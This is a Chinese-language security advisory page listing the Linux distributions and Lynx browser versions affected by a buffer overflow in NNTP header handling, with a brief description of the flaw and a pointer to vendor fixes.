+ Mandriva Linux Mandrake 2006.0
+ Mandriva Linux Mandrake 10.2 x86_64
+ Mandriva Linux Mandrake 10.2
+ Mandriva Linux Mandrake 10.1 x86_64
+ Mandriva Linux Mandrake 10.1
+ Ubuntu Ubuntu Linux 5.10 powerpc
+ Ubuntu Ubuntu Linux 5.10 i386
+ Ubuntu Ubuntu Linux 5.10 amd64
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
University of Kansas Lynx 2.8.4 rel.1
University of Kansas Lynx 2.8.4
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Debian Linux 3.0
+ RedHat Linux for iSeries 7.1
+ RedHat Linux for pSeries 7.1
+ Sun Linux 5.0.6
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
University of Kansas Lynx 2.8.3 rel.1
University of Kansas Lynx 2.8.3 pre.5
University of Kansas Lynx 2.8.3 dev2x
University of Kansas Lynx 2.8.3 dev.22
University of Kansas Lynx 2.8.3
+ Debian Linux 2.2
University of Kansas Lynx 2.8.2 rel.1
University of Kansas Lynx 2.8.1
University of Kansas Lynx 2.8
University of Kansas Lynx 2.7
Trustix Secure Linux 3.0
Trustix Secure Linux 2.2
Trustix Secure Enterprise Linux 2.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
Slackware Linux 10.2
Slackware Linux 10.1
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux 9.0
Slackware Linux 8.1
Slackware Linux -current
SGI Advanced Linux Environment 3.0
SCO Unixware 7.1.4
SCO Unixware 7.1.3
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
RedHat Linux 9.0 i386
RedHat Linux 7.3 i386
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1
RedHat Desktop 4.0
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
Red Hat Fedora Core4
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1
OpenPKG OpenPKG 2.5
OpenPKG OpenPKG 2.4
OpenPKG OpenPKG 2.3
OpenPKG OpenPKG Current
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0
Conectiva Linux 10.0
Avaya S8710 R2.0.1
Avaya S8710 R2.0.0
Avaya S8700 R2.0.1
Avaya S8700 R2.0.0
Avaya S8500 R2.0.1
Avaya S8500 R2.0.0
Avaya S8300 R2.0.1
Avaya S8300 R2.0.0
University of Kansas Lynx 2.8.6 dev14

- 不受影响的程序版本

University of Kansas Lynx 2.8.6 dev14

- 漏洞讨论

Lynx is prone to a buffer overflow when handling NNTP article headers.

This issue may be exploited when the browser handles NNTP content, such as through 'news:' or 'nntp:' URIs. Successful exploitation will result in code execution in the context of the program user.

- 漏洞利用

A proof-of-concept, denial-of-service exploit is included in the attached 'lynx-data.zip' file:

- 解决方案

Please see the attached advisories for details on obtaining and applying fixes.


Conectiva Linux 10.0

University of Kansas Lynx 2.8.2 rel.1

University of Kansas Lynx 2.8.3 dev2x

University of Kansas Lynx 2.8.3 dev.22

University of Kansas Lynx 2.8.3 rel.1

University of Kansas Lynx 2.8.3 pre.5

University of Kansas Lynx 2.8.3

University of Kansas Lynx 2.8.4

University of Kansas Lynx 2.8.4 rel.1

University of Kansas Lynx 2.8.5 dev.5

University of Kansas Lynx 2.8.5 dev.4

University of Kansas Lynx 2.8.5

University of Kansas Lynx 2.8.5 dev.3

University of Kansas Lynx 2.8.5 dev.8

University of Kansas Lynx 2.8.6 dev4

University of Kansas Lynx 2.8.6 dev1

University of Kansas Lynx 2.8.6 dev10

University of Kansas Lynx 2.8.6 dev8

University of Kansas Lynx 2.8.6 dev6

University of Kansas Lynx 2.8.6 dev11

University of Kansas Lynx 2.8.6 dev3

University of Kansas Lynx 2.8.6 dev2

SCO Unixware 7.1.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站